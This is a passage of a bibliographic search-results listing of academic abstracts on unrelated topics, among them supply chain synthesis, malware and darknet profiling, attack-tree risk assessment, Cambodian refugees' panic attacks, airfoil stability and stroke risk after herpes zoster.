    The concept of an integrated or synthesized supply chain is a strategy for managing today's globalized and customer driven supply chains in order to better meet customer demands. Synthesizing individual entities into an integrated supply chain can be a challenging task due to a variety of factors including conflicting objectives, mismatched incentives and constraints of the individual entities. Furthermore, understanding the effects of disruptions occurring at any point in the system is difficult when working toward synthesizing supply chain operations. Therefore, the goal of this research is to present a modeling methodology to manage the synthesis of a supply chain by linking hierarchical levels of the system and to model and analyze disruptions in the integrated supply chain. The contribution of this research is threefold: (1) supply chain systems can be modeled hierarchically (2) the performance of synthesized supply chain system can be evaluated quantitatively (3) reachability analysis is used to evaluate the system performance and verify whether a specific state is reachable, allowing the user to understand the extent of effects of a disruption.

  17. Formation of the methodological matrix of the strategic analysis of the enterprise

    Directory of Open Access Journals (Sweden)

    N.H. Vygovskaya

    2018-04-01

    Full Text Available The article is devoted to the study of the methodological matrix of the strategic analysis of the enterprise. The aim of this article is to analyze the influence of methodological changes in the 20th century on the methodology of strategic analysis; critical assessment and generalization of scientific approaches to its methods. Evaluation of scientific works on analysis made it possible to identify such problems in the methodology of strategic analysis as the lack of consideration of the features of strategic analysis in the formation of its methods, which often leads to confusion of methods of financial (economic, thrifty analysis; failure to use the fact that the strategic analysis contains, besides the methods of analyzing the internal and external environment, the methods of forecast analysis aimed at forming the strategy for the development of the enterprise; identification of the concepts «image», «reception», «method» of analysis; multidirectionality and indistinctness of signs of classification of methods of strategic analysis; blind copying of foreign methods of application of techniques and methods of strategic analysis without taking into account the specifics of domestic economic conditions. The expediency of using the system approach in forming the methodological design of strategic analysis is proved, which will allow to combine the methodology as a science of methods (a broad approach to the methods of strategic analysis with methodology as a set of applied methods and methods of analysis (narrow approach to methodology. The use of the system approach allowed to distinguish three levels of the methodology of strategic analysis. The first and second levels of methodology correspond to the level of science, the third level – the practice. When developing the third level of special methods of strategic analysis, an approach is applied that differentiates them depending on the stages of strategic analysis (methods of the stage

  18. A METHODOLOGICAL APPROACH TO THE STRATEGIC ANALYSIS OF FOOD SECURITY

    Directory of Open Access Journals (Sweden)

    Anastasiia Mostova

    2017-12-01

    Full Text Available The objective of present work is to substantiate the use of tools for strategic analysis in order to develop a strategy for the country’s food security under current conditions and to devise the author’s original technique to perform strategic analysis of food security using a SWOT-analysis. The methodology of the study. The article substantiates the need for strategic planning of food security. The author considers stages in strategic planning and explains the importance of the stage of strategic analysis of the country’s food security. It is proposed to apply a SWOT-analysis when running a strategic analysis of food security. The study is based on the system of indicators and characteristics of the country’s economy, agricultural sector, market trends, material-technical, financial, human resources, which are essential to obtain an objective assessment of the impact of trends and factors on food security, and in order to further develop the procedure for conducting a strategic analysis of the country’s food security. Results of the study. The procedure for strategic analysis of food security is developed based on the tool of a SWOT-analysis, which implies three stages: a strategic analysis of weaknesses and strengths, opportunities and threats; construction of the matrix of weaknesses and strengths, opportunities, and threats (SWOT-analysis matrix; formation of the food security strategy based on the SWOT-analysis matrix. A list of characteristics was compiled in order to conduct a strategic analysis of food security and to categorize them as strengths or weaknesses, threats, and opportunities. The characteristics are systemized into strategic groups: production, market; resources; consumption: this is necessary for the objective establishing of strategic directions, responsible performers, allocation of resources, and effective control, for the purpose of further development and implementation of the strategy. A strategic analysis

  19. Performance Analysis with Network-Enhanced Complexities: On Fading Measurements, Event-Triggered Mechanisms, and Cyber Attacks

    Directory of Open Access Journals (Sweden)

    Derui Ding

    2014-01-01

    Full Text Available Nowadays, the real-world systems are usually subject to various complexities such as parameter uncertainties, time-delays, and nonlinear disturbances. For networked systems, especially large-scale systems such as multiagent systems and systems over sensor networks, the complexities are inevitably enhanced in terms of their degrees or intensities because of the usage of the communication networks. Therefore, it would be interesting to (1 examine how this kind of network-enhanced complexities affects the control or filtering performance; and (2 develop some suitable approaches for controller/filter design problems. In this paper, we aim to survey some recent advances on the performance analysis and synthesis with three sorts of fashionable network-enhanced complexities, namely, fading measurements, event-triggered mechanisms, and attack behaviors of adversaries. First, these three kinds of complexities are introduced in detail according to their engineering backgrounds, dynamical characteristic, and modelling techniques. Then, the developments of the performance analysis and synthesis issues for various networked systems are systematically reviewed. Furthermore, some challenges are illustrated by using a thorough literature review and some possible future research directions are highlighted.

  20. Practical Correlation Analysis between Scan and Malware Profiles against Zero-Day Attacks Based on Darknet Monitoring

    Science.gov (United States)

    Nakao, Koji; Inoue, Daisuke; Eto, Masashi; Yoshioka, Katsunari

    Considering rapid increase of recent highly organized and sophisticated malwares, practical solutions for the countermeasures against malwares especially related to zero-day attacks should be effectively developed in an urgent manner. Several research activities have been already carried out focusing on statistic calculation of network events by means of global network sensors (so-called macroscopic approach) as well as on direct malware analysis such as code analysis (so-called microscopic approach). However, in the current research activities, it is not clear at all how to inter-correlate between network behaviors obtained from macroscopic approach and malware behaviors obtained from microscopic approach. In this paper, in one side, network behaviors observed from darknet are strictly analyzed to produce scan profiles, and in the other side, malware behaviors obtained from honeypots are correctly analyzed so as to produce a set of profiles containing malware characteristics. To this end, inter-relationship between above two types of profiles is practically discussed and studied so that frequently observed malwares behaviors can be finally identified in view of scan-malware chain.

  1. Neck-focused panic attacks among Cambodian refugees; a logistic and linear regression analysis.

    Science.gov (United States)

    Hinton, Devon E; Chhean, Dara; Pich, Vuth; Um, Khin; Fama, Jeanne M; Pollack, Mark H

    2006-01-01

    Consecutive Cambodian refugees attending a psychiatric clinic were assessed for the presence and severity of current--i.e., at least one episode in the last month--neck-focused panic. Among the whole sample (N=130), in a logistic regression analysis, the Anxiety Sensitivity Index (ASI; odds ratio=3.70) and the Clinician-Administered PTSD Scale (CAPS; odds ratio=2.61) significantly predicted the presence of current neck panic (NP). Among the neck panic patients (N=60), in the linear regression analysis, NP severity was significantly predicted by NP-associated flashbacks (beta=.42), NP-associated catastrophic cognitions (beta=.22), and CAPS score (beta=.28). Further analysis revealed the effect of the CAPS score to be significantly mediated (Sobel test [Baron, R. M., & Kenny, D. A. (1986). The moderator-mediator variable distinction in social psychological research: conceptual, strategic, and statistical considerations. Journal of Personality and Social Psychology, 51, 1173-1182]) by both NP-associated flashbacks and catastrophic cognitions. In the care of traumatized Cambodian refugees, NP severity, as well as NP-associated flashbacks and catastrophic cognitions, should be specifically assessed and treated.

  2. Using functional analysis in archival appraisal a practical and effective alternative to traditional appraisal methodologies

    CERN Document Server

    Robyns, Marcus C

    2014-01-01

    In an age of scarcity and the challenge of electronic records, can archivists and records managers continue to rely upon traditional methodology essentially unchanged since the early 1950s? Using Functional Analysis in Archival Appraisal: A Practical and Effective Alternative to Traditional Appraisal Methodologies shows how archivists in other countries are already using functional analysis, which offers a better, more effective, and imminently more practical alternative to traditional appraisal methodologies that rely upon an analysis of the records themselves.

  3. Population Analysis: A Methodology for Understanding Populations in COIN Environments

    National Research Council Canada - National Science Library

    Burke, Mark C; Self, Eric C

    2008-01-01

    .... Our methodology provides a heuristic model, called the "3 x 5 P.I.G.S.P.E.E.R. Model," that can be applied in any environment and will help bridge the gap between strategic theory and tactical implementation...

  4. Ion beam analysis in art and archaeology: attacking the power precisions paradigm

    International Nuclear Information System (INIS)

    Abraham, Meg

    2004-01-01

    It is a post-modern axiom that the closer one looks at something the more blinkered is the view, thus the result is often a failure to see the whole picture. With this in mind, the value of a tool for art and archaeology applications is greatly enhanced if the information is scientifically precise and yet is easily integrated into the broader study regarding the objects at hand. Art and archaeological objects offer some unique challenges for researchers. First, they are almost always extraordinarily inhomogeneous across individual pieces and across types. Second they are often valuable and delicate so sampling is discouraged. Finally, in most cases, each piece is unique, thus the data is also unique and is of greatest value when incorporated into the overall understanding of the object or of the culture of the artisan. Ion beam analysis solves many of these problems. With IBA, it is possible to avoid sampling by using an external beam setup or by manipulating small objects in a vacuum. The technique is largely non-destructive, allowing for multiple data points to be taken across an object. The X-ray yields are from deeper in the sample than those of other techniques and using RBS one can attain bulk concentrations from microns into the sample. And finally, the resulting X-ray spectra is easily interpreted and understood by many conservators and curators, while PIXE maps are a wonderful visual record of the results of the analysis. Some examples of the special role that ion beam analysis plays in the examination of cultural objects will be covered in this talk

  5. The development of a safety analysis methodology for the optimized power reactor 1000

    International Nuclear Information System (INIS)

    Hwang-Yong, Jun; Yo-Han, Kim

    2005-01-01

    Korea Electric Power Research Institute (KEPRI) has been developing inhouse safety analysis methodology based on the delicate codes available to KEPRI to overcome the problems arising from currently used vendor oriented methodologies. For the Loss of Coolant Accident (LOCA) analysis, the KREM (KEPRI Realistic Evaluation Methodology) has been developed based on the RELAP-5 code. The methodology was approved for the Westinghouse 3-loop plants by the Korean regulatory organization and the project to extent the methodology to the Optimized Power Reactor 1000 (OPR1000) has been ongoing since 2001. Also, for the Non-LOCA analysis, the KNAP (Korea Non-LOCA Analysis Package) has been developed using the UNICORN-TM code system. To demonstrate the feasibility of these codes systems and methodologies, some typical cases of the design basis accidents mentioned in the final safety analysis report (FSAR) were analyzed. (author)

  6. Improved Methodology of MSLB M/E Release Analysis for OPR1000

    International Nuclear Information System (INIS)

    Park, Seok Jeong; Kim, Cheol Woo; Seo, Jong Tae

    2006-01-01

    A new mass and energy (M/E) release analysis methodology for the equipment environmental qualification (EEQ) on loss-of-coolant accident (LOCA) has been recently developed and adopted on small break LOCA EEQ. The new methodology for the M/E release analysis is extended to the M/E release analysis for the containment design for large break LOCA and the main steam line break (MSLB) accident, and named KIMERA (KOPEC Improved Mass and Energy Release Analysis) methodology. The computer code systems used in this methodology is RELAP5K/CONTEMPT4 (or RELAP5-ME) which couples RELAP5/MOD3.1/K with enhanced M/E model and LOCA long term model, and CONTEMPT4/ MOD5. This KIMERA methodology is applied to the MSLB M/E release analysis to evaluate the validation of KIMERA methodology for MSLB in containment design. The results are compared with the OPR 1000 FSAR

  7. Motor Impairments in Transient Ischemic Attack Increase the Odds of a Subsequent Stroke: A Meta-Analysis

    Directory of Open Access Journals (Sweden)

    Neha Lodha

    2017-06-01

    Full Text Available Background and purposeTransient ischemic attack (TIA increases the risk for a subsequent stroke. Typical symptoms include motor weakness, gait disturbance, and loss of coordination. The association between the presence of motor impairments during a TIA and the chances of a subsequent stroke has not been examined. In the current meta-analysis, we examine whether the odds of a stroke are greater in TIA individuals who experience motor impairments as compared with those who do not experience motor impairments.MethodsWe conducted a systematic search of electronic databases as well as manual searches of the reference lists of retrieved articles. The meta-analysis included studies that reported an odds ratio relating motor impairments to a subsequent stroke, or the number of individuals with or without motor impairments who experienced a subsequent stroke. We examined these studies using rigorous meta-analysis techniques including random effects model, forest and funnel plots, I2, publication bias, and fail-safe analysis.ResultsTwenty-four studies with 15,129 participants from North America, Australia, Asia, and Europe qualified for inclusion. An odds ratio of 2.11 (95% CI, 1.67–2.65, p = 0.000 suggested that the chances of a subsequent stroke are increased by twofolds in individuals who experience motor impairments during a TIA compared with those individuals who have no motor impairments.ConclusionThe presence of motor impairments during TIA is a significantly high-risk clinical characteristic for a subsequent stroke. The current evidence for motor impairments following TIA relies exclusively on the clinical reports of unilateral motor weakness. A comprehensive examination of motor impairments in TIA will enhance TIA prognosis and restoration of residual motor impairments.

  8. EUROCONTROL-Systemic Occurrence Analysis Methodology (SOAM)-A 'Reason'-based organisational methodology for analysing incidents and accidents

    International Nuclear Information System (INIS)

    Licu, Tony; Cioran, Florin; Hayward, Brent; Lowe, Andrew

    2007-01-01

    The Safety Occurrence Analysis Methodology (SOAM) developed for EUROCONTROL is an accident investigation methodology based on the Reason Model of organisational accidents. The purpose of a SOAM is to broaden the focus of an investigation from human involvement issues, also known as 'active failures of operational personnel' under Reason's original model, to include analysis of the latent conditions deeper within the organisation that set the context for the event. Such an approach is consistent with the tenets of Just Culture in which people are encouraged to provide full and open information about how incidents occurred, and are not penalised for errors. A truly systemic approach is not simply a means of transferring responsibility for a safety occurrence from front-line employees to senior managers. A consistent philosophy must be applied, where the investigation process seeks to correct deficiencies wherever they may be found, without attempting to apportion blame or liability

  9. Methodologies for analysis of patterning in the mouse RPE sheet

    Science.gov (United States)

    Boatright, Jeffrey H.; Dalal, Nupur; Chrenek, Micah A.; Gardner, Christopher; Ziesel, Alison; Jiang, Yi; Grossniklaus, Hans E.

    2015-01-01

    Purpose Our goal was to optimize procedures for assessing shapes, sizes, and other quantitative metrics of retinal pigment epithelium (RPE) cells and contact- and noncontact-mediated cell-to-cell interactions across a large series of flatmount RPE images. Methods The two principal methodological advances of this study were optimization of a mouse RPE flatmount preparation and refinement of open-access software to rapidly analyze large numbers of flatmount images. Mouse eyes were harvested, and extra-orbital fat and muscles were removed. Eyes were fixed for 10 min, and dissected by puncturing the cornea with a sharp needle or a stab knife. Four radial cuts were made with iridectomy scissors from the puncture to near the optic nerve head. The lens, iris, and the neural retina were removed, leaving the RPE sheet exposed. The dissection and outcomes were monitored and evaluated by video recording. The RPE sheet was imaged under fluorescence confocal microscopy after staining for ZO-1 to identify RPE cell boundaries. Photoshop, Java, Perl, and Matlab scripts, as well as CellProfiler, were used to quantify selected parameters. Data were exported into Excel spreadsheets for further analysis. Results A simplified dissection procedure afforded a consistent source of images that could be processed by computer. The dissection and flatmounting techniques were illustrated in a video recording. Almost all of the sheet could be routinely imaged, and substantial fractions of the RPE sheet (usually 20–50% of the sheet) could be analyzed. Several common technical problems were noted and workarounds developed. The software-based analysis merged 25 to 36 images into one and adjusted settings to record an image suitable for large-scale identification of cell-to-cell boundaries, and then obtained quantitative descriptors of the shape of each cell, its neighbors, and interactions beyond direct cell–cell contact in the sheet. To validate the software, human- and computer

  10. GO-FLOW methodology. Basic concept and integrated analysis framework for its applications

    International Nuclear Information System (INIS)

    Matsuoka, Takeshi

    2010-01-01

    GO-FLOW methodology is a success oriented system analysis technique, and is capable of evaluating a large system with complex operational sequences. Recently an integrated analysis framework of the GO-FLOW has been developed for the safety evaluation of elevator systems by the Ministry of Land, Infrastructure, Transport and Tourism, Japanese Government. This paper describes (a) an Overview of the GO-FLOW methodology, (b) Procedure of treating a phased mission problem, (c) Common cause failure analysis, (d) Uncertainty analysis, and (e) Integrated analysis framework. The GO-FLOW methodology is a valuable and useful tool for system reliability analysis and has a wide range of applications. (author)

  11. Seismic hazard analysis. A methodology for the Eastern United States

    Energy Technology Data Exchange (ETDEWEB)

    Bernreuter, D L

    1980-08-01

    This report presents a probabilistic approach for estimating the seismic hazard in the Central and Eastern United States. The probabilistic model (Uniform Hazard Methodology) systematically incorporates the subjective opinion of several experts in the evaluation of seismic hazard. Subjective input, assumptions and associated hazard are kept separate for each expert so as to allow review and preserve diversity of opinion. The report is organized into five sections: Introduction, Methodology Comparison, Subjective Input, Uniform Hazard Methodology (UHM), and Uniform Hazard Spectrum. Section 2 Methodology Comparison, briefly describes the present approach and compares it with other available procedures. The remainder of the report focuses on the UHM. Specifically, Section 3 describes the elicitation of subjective input; Section 4 gives details of various mathematical models (earthquake source geometry, magnitude distribution, attenuation relationship) and how these models re combined to calculate seismic hazard. The lost section, Uniform Hazard Spectrum, highlights the main features of typical results. Specific results and sensitivity analyses are not presented in this report. (author)

  12. Towards a Methodological Improvement of Narrative Inquiry: A Qualitative Analysis

    Science.gov (United States)

    Abdallah, Mahmoud Mohammad Sayed

    2009-01-01

    The article suggests that though narrative inquiry as a research methodology entails free conversations and personal stories, yet it should not be totally free and fictional as it has to conform to some recognized standards used for conducting educational research. Hence, a qualitative study conducted by Russ (1999) was explored as an exemplar…

  13. Prototype application of best estimate and uncertainty safety analysis methodology to large LOCA analysis

    International Nuclear Information System (INIS)

    Luxat, J.C.; Huget, R.G.

    2001-01-01

    Development of a methodology to perform best estimate and uncertainty nuclear safety analysis has been underway at Ontario Power Generation for the past two and one half years. A key driver for the methodology development, and one of the major challenges faced, is the need to re-establish demonstrated safety margins that have progressively been undermined through excessive and compounding conservatism in deterministic analyses. The major focus of the prototyping applications was to quantify the safety margins that exist at the probable range of high power operating conditions, rather than the highly improbable operating states associated with Limit of the Envelope (LOE) assumptions. In LOE, all parameters of significance to the consequences of a postulated accident are assumed to simultaneously deviate to their limiting values. Another equally important objective of the prototyping was to demonstrate the feasibility of conducting safety analysis as an incremental analysis activity, as opposed to a major re-analysis activity. The prototype analysis solely employed prior analyses of Bruce B large break LOCA events - no new computer simulations were undertaken. This is a significant and novel feature of the prototyping work. This methodology framework has been applied to a postulated large break LOCA in a Bruce generating unit on a prototype basis. This paper presents results of the application. (author)

  14. Visualizing Risks: Icons for Information Attack Scenarios

    National Research Council Canada - National Science Library

    Hosmer, Hilary

    2000-01-01

    .... Visual attack scenarios help defenders see system ambiguities, imprecision, vulnerabilities and omissions, thus speeding up risk analysis, requirements gathering, safeguard selection, cryptographic...

  15. BiGlobal linear stability analysis on low-Re flow past an airfoil at high angle of attack

    KAUST Repository

    Zhang, Wei

    2016-04-04

    We perform BiGlobal linear stability analysis on flow past a NACA0012 airfoil at 16° angle of attack and Reynolds number ranging from 400 to 1000. The steady-state two-dimensional base flows are computed using a well-tested finite difference code in combination with the selective frequency damping method. The base flow is characterized by two asymmetric recirculation bubbles downstream of the airfoil whose streamwise extent and the maximum reverse flow velocity increase with the Reynolds number. The stability analysis of the flow past the airfoil is carried out under very small spanwise wavenumber β = 10−4 to approximate the two-dimensional perturbation, and medium and large spanwise wavenumbers (β = 1–8) to account for the three-dimensional perturbation. Numerical results reveal that under small spanwise wavenumber, there are at most two oscillatory unstable modes corresponding to the near wake and far wake instabilities; the growth rate and frequency of the perturbation agree well with the two-dimensional direct numerical simulation results under all Reynolds numbers. For a larger spanwise wavenumber β = 1, there is only one oscillatory unstable mode associated with the wake instability at Re = 400 and 600, while at Re = 800 and 1000 there are two oscillatory unstable modes for the near wake and far wake instabilities, and one stationary unstable mode for the monotonically growing perturbation within the recirculation bubble via the centrifugal instability mechanism. All the unstable modes are weakened or even suppressed as the spanwise wavenumber further increases, among which the stationary mode persists until β = 4.

  16. BiGlobal linear stability analysis on low-Re flow past an airfoil at high angle of attack

    KAUST Repository

    Zhang, Wei; Samtaney, Ravi

    2016-01-01

    We perform BiGlobal linear stability analysis on flow past a NACA0012 airfoil at 16° angle of attack and Reynolds number ranging from 400 to 1000. The steady-state two-dimensional base flows are computed using a well-tested finite difference code in combination with the selective frequency damping method. The base flow is characterized by two asymmetric recirculation bubbles downstream of the airfoil whose streamwise extent and the maximum reverse flow velocity increase with the Reynolds number. The stability analysis of the flow past the airfoil is carried out under very small spanwise wavenumber β = 10−4 to approximate the two-dimensional perturbation, and medium and large spanwise wavenumbers (β = 1–8) to account for the three-dimensional perturbation. Numerical results reveal that under small spanwise wavenumber, there are at most two oscillatory unstable modes corresponding to the near wake and far wake instabilities; the growth rate and frequency of the perturbation agree well with the two-dimensional direct numerical simulation results under all Reynolds numbers. For a larger spanwise wavenumber β = 1, there is only one oscillatory unstable mode associated with the wake instability at Re = 400 and 600, while at Re = 800 and 1000 there are two oscillatory unstable modes for the near wake and far wake instabilities, and one stationary unstable mode for the monotonically growing perturbation within the recirculation bubble via the centrifugal instability mechanism. All the unstable modes are weakened or even suppressed as the spanwise wavenumber further increases, among which the stationary mode persists until β = 4.

  17. Proposed methodology for completion of scenario analysis for the Basalt Waste Isolation Project

    International Nuclear Information System (INIS)

    Roberds, W.J.; Plum, R.J.; Visca, P.J.

    1984-11-01

    This report presents the methodology to complete an assessment of postclosure performance, considering all credible scenarios, including the nominal case, for a proposed repository for high-level nuclear waste at the Hanford Site, Washington State. The methodology consists of defensible techniques for identifying and screening scenarios, and for then assessing the risks associated with each. The results of the scenario analysis are used to comprehensively determine system performance and/or risk for evaluation of compliance with postclosure performance criteria (10 CFR 60 and 40 CFR 191). In addition to describing the proposed methodology, this report reviews available methodologies for scenario analysis, discusses pertinent performance assessment and uncertainty concepts, advises how to implement the methodology (including the organizational requirements and a description of tasks) and recommends how to use the methodology in guiding future site characterization, analysis, and engineered subsystem design work. 36 refs., 24 figs., 1 tab

  18. Protecting Cryptographic Memory against Tampering Attack

    DEFF Research Database (Denmark)

    Mukherjee, Pratyay

    In this dissertation we investigate the question of protecting cryptographic devices from tampering attacks. Traditional theoretical analysis of cryptographic devices is based on black-box models which do not take into account the attacks on the implementations, known as physical attacks. In prac......In this dissertation we investigate the question of protecting cryptographic devices from tampering attacks. Traditional theoretical analysis of cryptographic devices is based on black-box models which do not take into account the attacks on the implementations, known as physical attacks....... In practice such attacks can be executed easily, e.g. by heating the device, as substantiated by numerous works in the past decade. Tampering attacks are a class of such physical attacks where the attacker can change the memory/computation, gains additional (non-black-box) knowledge by interacting...... with the faulty device and then tries to break the security. Prior works show that generically approaching such problem is notoriously difficult. So, in this dissertation we attempt to solve an easier question, known as memory-tampering, where the attacker is allowed tamper only with the memory of the device...

  19. Time-motion analysis of goalball players in attacks: differences of the player positions and the throwing techniques.

    Science.gov (United States)

    Monezi, Lucas Antônio; Magalhães, Thiago Pinguelli; Morato, Márcio Pereira; Mercadante, Luciano Allegretti; Furtado, Otávio Luis Piva da Cunha; Misuta, Milton Shoiti

    2018-03-26

    In this study, we aimed to analyse goalball players time-motion variables (distance covered, time spent, maximum and average velocities) in official goalball match attacks, taking into account the attack phases (preparation and throwing), player position (centres and wings) and throwing techniques (frontal, spin and between the legs). A total of 365 attacks were assessed using a video based method (2D) through manual tracking using the Dvideo system. Inferential non-parametric statistics were applied for comparison of preparation vs. throwing phase, wings vs. centres and, among the throwing techniques, frontal, spin and between the legs. Significant differences were found between the attack preparation versus the throwing phase for all player time-motion variables: distance covered, time spent, maximum player velocity and average player velocity. Wing players performed most of the throws (85%) and covered longer distances than centres (1.65 vs 0.31 m). The between the legs and the spin throwing techniques presented greater values for most of the time-motion variables (distance covered, time spent and maximum player velocity) than did the frontal technique in both attack phases. These findings provide important information regarding players' movement patterns during goalball matches that can be used to plan more effective training.

  20. Common cause failure analysis methodology for complex systems

    International Nuclear Information System (INIS)

    Wagner, D.P.; Cate, C.L.; Fussell, J.B.

    1977-01-01

    Common cause failure analysis, also called common mode failure analysis, is an integral part of a complex system reliability analysis. This paper extends existing methods of computer aided common cause failure analysis by allowing analysis of the complex systems often encountered in practice. The methods presented here aid in identifying potential common cause failures and also address quantitative common cause failure analysis

  1. Discovering the Effects-Endstate Linkage: Using Soft Systems Methodology to Perform EBO Mission Analysis

    National Research Council Canada - National Science Library

    Young, Jr, William E

    2005-01-01

    .... EBO mission analysis is shown to be more problem structuring than problem solving. A new mission analysis process is proposed using a modified version of Soft Systems Methodology to meet these challenges...

  2. Tsunami vulnerability analysis in the coastal town of Catania, Sicily: methodology and results

    Science.gov (United States)

    Pagnoni, Gianluca; Tinti, Stefano; Gallazzi, Sara; Tonini, Roberto; Zaniboni, Filippo

    2010-05-01

    Catania lies on the eastern coast of Sicily and is one of the most important towns in Sicily as regards history, tourism and industry. Recent analyses conducted in the frame of the project TRANSFER have shown that it is exposed not only to tsunamis generated locally, but also to distant tsunamis generated in the western Hellenic arc. In the frame of the European project SCHEMA different scenarios covering local sources such as the 11 January 1693 event and the 1908 case as well as remote sources such as the 365 AD tsunami have been explored through numerical modelling in order to assess the vulnerability of the area to tsunami attacks. One of the primary outcomes of the scenario analysis is the quantification of the inundation zones (location, extension along the coast and landward). Taking the modelling results on flooding as input data, the analysis has focussed on the geomorphological characteristics of the coasts and on the buildings and infrastructure typology to make evaluation of the vulnerability level of the Catania area. The coast to the south of the harbour of Catania is low and characterized by a mild slope: topography reaches the altitude of 10 m between 300-750 m distance from the shoreline. Building density is low, and generally tourist structures prevail on residential houses. The zone north of the harbour is high-coast, with 10 m isoline usually close to the coastline, and little possibility for flood to penetrate deep inland. Here there are three small marinas with the corresponding services and infrastructure around, and the city quarters consists of residential buildings. Vulnerability assessment has been carried out by following the methodology developed by the SCHEMA consortium, distinguishing between primary (type and material) and secondary criteria (e.g. ground, age, foundation, orientation, etc.) for buildings, and by adopting a building damage matrix, basically depending on building type and water inundation depth. Data needed for such

  3. Attack Trees for Practical Security Assessment: Ranking of Attack Scenarios with ADTool 2.0

    NARCIS (Netherlands)

    Gadyatskaya, Olga; Jhawar, Ravi; Kordy, P.T.; Lounis, Karim; Mauw, Sjouke; Trujillo-Rasua, Rolando

    2016-01-01

    In this tool demonstration paper we present the ADTool2.0: an open-source software tool for design, manipulation and analysis of attack trees. The tool supports ranking of attack scenarios based on quantitative attributes entered by the user; it is scriptable; and it incorporates attack trees with

  4. Critical infrastructure systems of systems assessment methodology.

    Energy Technology Data Exchange (ETDEWEB)

    Sholander, Peter E.; Darby, John L.; Phelan, James M.; Smith, Bryan; Wyss, Gregory Dane; Walter, Andrew; Varnado, G. Bruce; Depoy, Jennifer Mae

    2006-10-01

    Assessing the risk of malevolent attacks against large-scale critical infrastructures requires modifications to existing methodologies that separately consider physical security and cyber security. This research has developed a risk assessment methodology that explicitly accounts for both physical and cyber security, while preserving the traditional security paradigm of detect, delay, and respond. This methodology also accounts for the condition that a facility may be able to recover from or mitigate the impact of a successful attack before serious consequences occur. The methodology uses evidence-based techniques (which are a generalization of probability theory) to evaluate the security posture of the cyber protection systems. Cyber threats are compared against cyber security posture using a category-based approach nested within a path-based analysis to determine the most vulnerable cyber attack path. The methodology summarizes the impact of a blended cyber/physical adversary attack in a conditional risk estimate where the consequence term is scaled by a ''willingness to pay'' avoidance approach.

  5. Internal fire analysis screening methodology for the Salem Nuclear Generating Station

    International Nuclear Information System (INIS)

    Eide, S.; Bertucio, R.; Quilici, M.; Bearden, R.

    1989-01-01

    This paper reports on an internal fire analysis screening methodology that has been utilized for the Salem Nuclear Generating Station (SNGS) Probabilistic Risk Assessment (PRA). The methodology was first developed and applied in the Brunswick Steam Electric Plant (BSEP) PRA. The SNGS application includes several improvements and extensions to the original methodology. The SNGS approach differs significantly from traditional fire analysis methodologies by providing a much more detailed treatment of transient combustibles. This level of detail results in a model which is more usable for assisting in the management of fire risk at the plant

  6. Development Risk Methodology for Whole Systems Trade Analysis

    Science.gov (United States)

    2016-08-01

    WSTAT). In the early stages of the V&V for development risk, it was discovered that the original risk rating and methodology did not actually...4932 Standard Form 298 (Rev. 8-98) Prescribed by ANSI Std. Z39.18 ii THIS PAGE INTENTIONALLY LEFT ...WSTA has opened trade space exploration by allowing the tool to evaluate trillions of potential system configurations to then return a handful of

  7. Risk of Stroke/Transient Ischemic Attack or Myocardial Infarction with Herpes Zoster: A Systematic Review and Meta-Analysis.

    Science.gov (United States)

    Zhang, Yanting; Luo, Ganfeng; Huang, Yuanwei; Yu, Qiuyan; Wang, Li; Li, Ke

    2017-08-01

    Accumulating evidence indicates that herpes zoster (HZ) may increase the risk of stroke/transient ischemic attack (TIA) or myocardial infarction (MI), but the results are inconsistent. We aim to explore the relationship between HZ and risk of stroke/TIA or MI and between herpes zoster ophthalmicus (HZO) and stroke. We estimated the relative risk (RR) and 95% confidence intervals (CIs) with the meta-analysis. Cochran's Q test and Higgins I 2 statistic were used to check for heterogeneity. HZ infection was significantly associated with increased risk of stroke/TIA (RR = 1.30, 95% CI: 1.17-1.46) or MI (RR = 1.18, 95% CI: 1.07-1.30). The risk of stroke after HZO was 1.91 (95% CI 1.32-2.76), higher than that after HZ. Subgroup analyses revealed increased risk of ischemic stroke after HZ infection but not hemorrhagic stroke. The risk of stroke was increased more at 1 month after HZ infection than at 1-3 months, with a gradual reduced risk with time. The risk of stroke after HZ infection was greater with age less than 40 years than 40-59 years and more than 60 years. Risk of stroke with HZ infection was greater without treatment than with treatment and was greater in Asia than Europe and America but did not differ by sex. Our study indicated that HZ infection was associated with increased risk of stroke/TIA or MI, and HZO infection was the most marked risk factor for stroke. Further studies are needed to explore whether zoster vaccination could reduce the risk of stoke/TIA or MI. Copyright © 2017 National Stroke Association. Published by Elsevier Inc. All rights reserved.

  8. Component build-up method for engineering analysis of missiles at low-to-high angles of attack

    Science.gov (United States)

    Hemsch, Michael J.

    1992-01-01

    Methods are presented for estimating the component build-up terms, with the exception of zero-lift drag, for missile airframes in steady flow and at arbitrary angles of attack and bank. The underlying and unifying bases of all these efforts are slender-body theory and its nonlinear extensions through the equivalent angle-of-attack concept. Emphasis is placed on the forces and moments which act on each of the fins, so that control cross-coupling effects as well as longitudinal and lateral-directional effects can be determined.

  9. Integrating cyber attacks within fault trees

    International Nuclear Information System (INIS)

    Nai Fovino, Igor; Masera, Marcelo; De Cian, Alessio

    2009-01-01

    In this paper, a new method for quantitative security risk assessment of complex systems is presented, combining fault-tree analysis, traditionally used in reliability analysis, with the recently introduced Attack-tree analysis, proposed for the study of malicious attack patterns. The combined use of fault trees and attack trees helps the analyst to effectively face the security challenges posed by the introduction of modern ICT technologies in the control systems of critical infrastructures. The proposed approach allows considering the interaction of malicious deliberate acts with random failures. Formal definitions of fault tree and attack tree are provided and a mathematical model for the calculation of system fault probabilities is presented.

  10. Integrating cyber attacks within fault trees

    Energy Technology Data Exchange (ETDEWEB)

    Nai Fovino, Igor [Joint Research Centre - EC, Institute for the Protection and Security of the Citizen, Ispra, VA (Italy)], E-mail: igor.nai@jrc.it; Masera, Marcelo [Joint Research Centre - EC, Institute for the Protection and Security of the Citizen, Ispra, VA (Italy); De Cian, Alessio [Department of Electrical Engineering, University di Genova, Genoa (Italy)

    2009-09-15

    In this paper, a new method for quantitative security risk assessment of complex systems is presented, combining fault-tree analysis, traditionally used in reliability analysis, with the recently introduced Attack-tree analysis, proposed for the study of malicious attack patterns. The combined use of fault trees and attack trees helps the analyst to effectively face the security challenges posed by the introduction of modern ICT technologies in the control systems of critical infrastructures. The proposed approach allows considering the interaction of malicious deliberate acts with random failures. Formal definitions of fault tree and attack tree are provided and a mathematical model for the calculation of system fault probabilities is presented.

  11. Predicting Factors of Zone 4 Attack in Volleyball.

    Science.gov (United States)

    Costa, Gustavo C; Castro, Henrique O; Evangelista, Breno F; Malheiros, Laura M; Greco, Pablo J; Ugrinowitsch, Herbert

    2017-06-01

